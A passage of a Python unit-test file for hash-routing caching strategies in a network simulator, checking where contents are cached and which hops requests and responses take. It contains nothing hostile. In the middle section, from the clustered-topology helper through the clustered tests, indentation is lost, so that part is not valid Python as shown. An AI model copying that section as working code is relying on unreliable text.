        model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
        self.view = NetworkView(model)
        self.controller = NetworkController(model)
        self.collector = DummyCollector(self.view)
        self.controller.attach_collector(self.collector)

    def tearDown(self):
        pass

    def _assert_locations(self, content, members, non_members=()):
        # Assert which nodes do (and do not) hold *content* network-wide.
        loc = self.view.content_locations(content)
        for node in members:
            self.assertIn(node, loc)
        for node in non_members:
            self.assertNotIn(node, loc)

    def _assert_local_lookups(self, content, expected):
        # expected maps node -> whether local_cache_lookup must succeed.
        for node, hit in expected.items():
            if hit:
                self.assertTrue(self.view.local_cache_lookup(node, content))
            else:
                self.assertFalse(self.view.local_cache_lookup(node, content))

    def _assert_session(self, exp_req_hops, exp_cont_hops, serving_node):
        # Compare hop sets and serving node of the last collector session.
        summary = self.collector.session_summary()
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual(serving_node, summary['serving_node'])

    def test_hashrouting_symmetric(self):
        hr = strategy.HashroutingOnPath(self.view, self.controller, 'SYMM', 0.25)
        hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
        # At time 1, request content 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: True})
        self._assert_session([("r", 1), (1, 4), (4, 3), (3, "s")],
                             [("s", 3), (3, 4), (4, 1), (1, "r")],
                             "s")
        # Let's request it again to make sure we have hit from edge cache
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: True})
        self._assert_session([("r", 1)], [(1, "r")], 1)
        # Now request content 7 which should replace 4 in the local cache of 1
        # but not 3, because 7 would take space in 3's coordinated ratio
        hr.process_event(1, "r", 7, True)
        self._assert_locations(7, ["s", 3])
        self._assert_local_lookups(7, {1: True, 2: True, 3: False})
        self._assert_session([("r", 1), (1, 2), (2, 3), (3, "s")],
                             [("s", 3), (3, 2), (2, 1), (1, "r")],
                             "s")
        # Verify where 4 is still stored
        self._assert_local_lookups(4, {1: False, 2: False, 3: True})
        # Request again 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: True})
        self._assert_session([("r", 1), (1, 4)], [(4, 1), (1, "r")], 4)

    def test_hashrouting_symmetric_zero_local(self):
        # Local (uncoordinated) ratio is 0: nothing is ever cached locally.
        hr = strategy.HashroutingOnPath(self.view, self.controller, 'SYMM', 0)
        hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
        # At time 1, request content 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4), (4, 3), (3, "s")],
                             [("s", 3), (3, 4), (4, 1), (1, "r")],
                             "s")
        # Second request is served by the coordinated cache at node 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4)], [(4, 1), (1, "r")], 4)
        # Request content 7, hash-routed to node 3
        hr.process_event(1, "r", 7, True)
        self._assert_locations(7, ["s", 3])
        self._assert_local_lookups(7, {1: False, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 2), (2, 3), (3, "s")],
                             [("s", 3), (3, 2), (2, 1), (1, "r")],
                             "s")
        # Verify where 4 is still stored
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        # Request again 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4)], [(4, 1), (1, "r")], 4)

    def test_hashrouting_symmetric_zero_coordinated(self):
        # Local ratio is 1: the coordinated portion has no capacity, so
        # contents never appear in content_locations of the routers.
        hr = strategy.HashroutingOnPath(self.view, self.controller, 'SYMM', 1)
        hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
        # At time 1, request content 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s"], non_members=[4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: True})
        self._assert_session([("r", 1), (1, 4), (4, 3), (3, "s")],
                             [("s", 3), (3, 4), (4, 1), (1, "r")],
                             "s")
        # Let's request it again to make sure we have hit from edge cache
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s"], non_members=[4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: True})
        self._assert_session([("r", 1)], [(1, "r")], 1)
        # Now request content 7 which should replace 4 in the local cache of 1
        hr.process_event(1, "r", 7, True)
        self._assert_locations(7, ["s"], non_members=[3])
        # Note: the lookup at node 3 is expected to fail, because we never
        # store items for the authoritative cache in the uncoordinated
        # section, even if the coordinated cache is empty
        self._assert_local_lookups(7, {1: True, 2: True, 3: False})
        self._assert_session([("r", 1), (1, 2), (2, 3), (3, "s")],
                             [("s", 3), (3, 2), (2, 1), (1, "r")],
                             "s")
        # Verify where 4 is still stored
        self._assert_local_lookups(4, {1: True, 2: False, 3: True})
        # Request again 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s"], non_members=[4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: True})
        self._assert_session([("r", 1)], [(1, "r")], 1)
class TestHashroutingClustered(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        # No class-level fixtures needed; all state is built per-test in setUp().
        pass
    @classmethod
    def tearDownClass(cls):
        # Nothing to clean up at class level.
        pass
@classmethod
def clustered_topology(cls):
"""Return topology for testing off-path caching strategies
"""
# Topology sketch
#
# 3 6
# / \ / \
# / \ / \
# RCV ---- 1 ---- 2 -[HIGH_DELAY]--- 4 ---- 5 ---- SRC
#
topology = IcnTopology()
topology.add_path(['RCV', 1, 2, 4, 5, 'SRC'])
topology.add_path([2, 3, 1])
topology.add_path([5, 6, 4])
fnss.set_delays_constant(topology, 1, 'ms')
fnss.set_delays_constant(topology, 15, 'ms', [(2, 4)])
caches = (1, 2, 3, 4, 5, 6)
contents = [1, 2, 3]
clusters = [set([1, 2, 3]), set([4, 5, 6])]
topology.graph['icr_candidates'] = set(caches)
topology.graph['clusters'] = clusters
fnss.add_stack(topology, "RCV", 'receiver', {})
topology.node["RCV"]["cluster"] = 0
fnss.add_stack(topology, "SRC", 'source', {'contents': contents})
topology.node["SRC"]["cluster"] = 1
for v in caches:
fnss.add_stack(topology, v, 'router', {'cache_size': 1})
topology.node[v]["cluster"] = (v - 1) // 3
return topology
def setUp(self):
topology = self.clustered_topology()
self.model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(self.model)
self.controller = NetworkController(self.model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
def tearDown(self):
pass
def test_hashrouting_symmetric_lce(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='SYMM',
inter_routing='LCE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# At time 1, receiver 0 requests content 2
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6), (6, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 6), (6, 4), (4, 2), (2, 3), (3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit from first cluster
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3)]
exp_cont_hops = [(3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 3)
# Delete entry on first cluster, expect hit on second cluster
self.model.cache[3].remove(3)
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6)]
exp_cont_hops = [(6, 4), (4, 2), (2, 3), (3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 6)
def test_hashrouting_asymmetric_lce(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='ASYMM',
inter_routing='LCE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# Expect miss
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 1)
self.assertIn("SRC", loc)
self.assertNotIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6), (6, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect miss again, but this time caches will be populated
hr.process_event(1, "RCV", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(2, loc)
self.assertIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 2), (2, 4), (4, 5), (5, 'SRC')]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit
hr.process_event(1, "RCV", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(2, loc)
self.assertIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 2)]
exp_cont_hops = [(2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 2)
def test_hashrouting_multicast_lce(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='MULTICAST',
inter_routing='LCE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# At time 1, receiver 0 requests content 2
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6), (6, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 6), (5, 4), (4, 2), (2, 3), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit from first cluster
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3)]
exp_cont_hops = [(3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 3)
# Delete entry on first cluster, expect hit on second cluster
self.model.cache[3].remove(3)
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6)]
exp_cont_hops = [(6, 4), (4, 2), (2, 3), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 6)
def test_hashrouting_symmetric_edge(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='SYMM',
inter_routing='EDGE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# At time 1, receiver 0 requests content 2
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(2, len(loc))
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 3), (3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit from first cluster
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3)]
exp_cont_hops = [(3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 3)
# Delete entry on first cluster, expect miss
self.model.cache[3].remove(3)
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 3), (3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("SRC", summary['serving_node'])
def test_hashrouting_asymmetric_edge(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='ASYMM',
inter_routing='EDGE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# Expect miss
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 1)
self.assertIn("SRC", loc)
self.assertNotIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect miss again, but this time caches will be populated
hr.process_event(1, "RCV", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(2, loc)
self.assertIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 2), (2, 4), (4, 5), (5, 'SRC')]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit
hr.process_event(1, "RCV", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(2, loc)
self.assertIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 2)]
exp_cont_hops = [(2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 2)
def test_hashrouting_multicast_edge(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='MULTICAST',
inter_routing='EDGE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# At time 1, receiver 0 requests content 2
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 3), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit from first cluster
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3)]
exp_cont_hops = [(3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 3)
# Delete entry on first cluster, expect miss
self.model.cache[3].remove(3)
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(2, len(loc))
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 3), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("SRC", summary['serving_node'])
class TestHashrouting(unittest.TestCase):
    """Tests for flat (non-clustered) hash-routing strategies on a ring topology."""

    @classmethod
    def setUpClass(cls):
        pass

    @classmethod
    def tearDownClass(cls):
        pass

    @classmethod
    def topology(cls):
        """Return topology for testing off-path caching strategies
        """
        # Topology sketch (receiver 7 attached to node 1 is not drawn)
        #
        #     -------- 5 ----------
        #    /                      \
        #   /                        \
        #  0 ---- 1 ---- 2 ---- 3 ---- 4
        #                |
        #                |
        #                6
        #
        topology = IcnTopology(fnss.ring_topology(6))
        topology.add_edge(2, 6)
        topology.add_edge(1, 7)
        source = 4
        receivers = (0, 6, 7)
        caches = (1, 2, 3, 5)
        contents = caches
        fnss.add_stack(topology, source, 'source', {'contents': contents})
        for v in caches:
            fnss.add_stack(topology, v, 'router', {'cache_size': 1})
        for v in receivers:
            fnss.add_stack(topology, v, 'receiver', {})
        return topology

    def setUp(self):
        topology = self.topology()
        model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
        self.view = NetworkView(model)
        self.controller = NetworkController(model)
        self.collector = DummyCollector(self.view)
        self.controller.attach_collector(self.collector)

    def tearDown(self):
        pass

    def test_hashrouting_symmetric(self):
        """Symmetric hash-routing: request and content follow the same path."""
        hr = strategy.HashroutingSymmetric(self.view, self.controller)
        hr.authoritative_cache = lambda x: x
        # At time 1, receiver 0 requests content 2
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 3), (3, 2), (2, 1), (1, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # At time 2 repeat request, expect cache hit
        hr.process_event(2, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2)}
        exp_cont_hops = {(2, 1), (1, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # Now request from node 6, expect hit
        hr.process_event(3, 6, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(6, 2)}
        exp_cont_hops = {(2, 6)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))

    def test_hashrouting_asymmetric(self):
        """Asymmetric hash-routing: content returns along the shortest path,
        caching only if the authoritative cache lies on it."""
        hr = strategy.HashroutingAsymmetric(self.view, self.controller)
        hr.authoritative_cache = lambda x: x
        # At time 1, receiver 0 requests content 2; return path 4-5-0 skips
        # the authoritative cache 2, so nothing is cached
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 1)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 5), (5, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # Now request from node 6, expect miss but cache insertion
        hr.process_event(2, 6, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(6, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 3), (3, 2), (2, 6)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # Now request from node 0 again, expect hit
        hr.process_event(3, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2)}
        exp_cont_hops = {(2, 1), (1, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))

    def test_hashrouting_multicast(self):
        """Multicast hash-routing: content is multicast to both the receiver
        and the authoritative cache."""
        hr = strategy.HashroutingMulticast(self.view, self.controller)
        hr.authoritative_cache = lambda x: x
        # At time 1, receiver 0 requests content 2
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 3), (3, 2), (4, 5), (5, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # At time 2 repeat request, expect cache hit
        hr.process_event(2, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2)}
        exp_cont_hops = {(2, 1), (1, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # Now request from node 6, expect hit
        hr.process_event(3, 6, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(6, 2)}
        exp_cont_hops = {(2, 6)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))

    def test_hashrouting_hybrid_am(self):
        """Hybrid AM hash-routing: choose asymmetric or multicast delivery
        depending on the extra path stretch of multicast."""
        hr = strategy.HashroutingHybridAM(self.view, self.controller, max_stretch=0.3)
        hr.authoritative_cache = lambda x: x
        # At time 1, receiver 0 requests content 2, expect asymmetric
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 1)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 5), (5, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # At time 2, receiver 0 requests content 3, expect multicast
        hr.process_event(3, 0, 3, True)
        loc = self.view.content_locations(3)
        self.assertEqual(len(loc), 2)
        self.assertIn(3, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 5), (5, 0), (4, 3)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # At time 3, receiver 0 requests content 5, expect symm = mcast = asymm
        hr.process_event(3, 0, 5, True)
        loc = self.view.content_locations(5)
        self.assertEqual(len(loc), 2)
        self.assertIn(5, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 5), (5, 4)}
        exp_cont_hops = {(4, 5), (5, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))

    def test_hashrouting_hybrid_am_max_stretch_0(self):
        """Hybrid AM with max_stretch=0 must always behave asymmetrically."""
        hr = strategy.HashroutingHybridAM(self.view, self.controller, max_stretch=0)
        hr.authoritative_cache = lambda x: x
        # At time 1, receiver 0 requests content 2
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 1)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 5), (5, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # Now request from node 6, expect miss but cache insertion
        hr.process_event(2, 6, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(6, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 3), (3, 2), (2, 6)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # Now request from node 0 again, expect hit
        hr.process_event(3, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2)}
        exp_cont_hops = {(2, 1), (1, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))

    def test_hashrouting_hybrid_am_max_stretch_1(self):
        """Hybrid AM with max_stretch=1 must always behave like multicast."""
        hr = strategy.HashroutingHybridAM(self.view, self.controller, max_stretch=1.0)
        hr.authoritative_cache = lambda x: x
        # At time 1, receiver 0 requests content 2
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
